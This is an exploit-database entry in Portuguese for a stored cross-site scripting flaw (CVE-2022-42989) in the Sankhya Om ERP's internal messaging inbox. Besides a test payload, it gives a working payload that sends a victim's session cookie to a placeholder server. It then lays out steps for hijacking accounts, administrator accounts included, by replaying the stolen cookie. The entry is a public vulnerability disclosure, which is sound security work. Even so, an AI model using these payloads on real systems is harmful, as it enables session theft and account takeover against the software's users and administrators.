ERP Sankhya 4.13.x Cross Site Scripting

# Exploit Title: ERP Sankhya - XSS to Account Takeover
# Google Dork: N/A
# Date: 19/10/2022
# Exploit Author: Lucas Alves Da Cunha - (0xLucas)
# Vendor Homepage: https://www.sankhya.com.br
# Version: Sankhya Om <= 4.13.x
# Tested on: Sankhya Om 4.11
# CVE: CVE-2022-42989

# Descrio: 
Um usurio comum no ERP Sankhya pode enviar uma mensagem para qualquer outro usurio do sistema inclusive administradores, atravs da funo "Caixa de Entrada". No corpo da mensagem, podemos injetar cdigos html/javascript levando para um cross site scripting.

Payload para verificar existncia da vulnerabilidade:
<img src=1 onerror=alert(1)>

Payload utilizado para capturar os dados da sesso do usurio:
<img src=1 onerror=document.location="http://yourserver/?cookie="+document.cookie>

# Passos para reproduo:
1 - Encontrando a funcionalidade: https://i.imgur.com/B9SWknH.png

2 - Enviando payload para verificar existncia da vulnerabilidade: https://i.imgur.com/ZKSkLmx.png
2.1 - Vulnerabilidade comprovada: https://i.imgur.com/1KiAa1m.png

3 - Explorando a vulnerabilidade: https://i.imgur.com/n8Jevum.png
3.1 - Sesso capturada: https://i.imgur.com/aDatjyN.png

Podemos utilizar os dados da sesso capturada e manipular a sesso utilizando a ferramenta: Cookie-Editor do Google Chrome, e assim entraremos na sesso do usurio desejado. Conforme a imagem a seguir: https://i.imgur.com/L10Yf9f.png

# Impacto:
Explorando essa vulnerabilidade, podemos comprometer qualquer conta de usurio do sistema, desde uma simples conta at mesmo uma conta de administrador do sistema, causando assim um grande impacto de negcio.

Copyright ©2024 Exploitalert.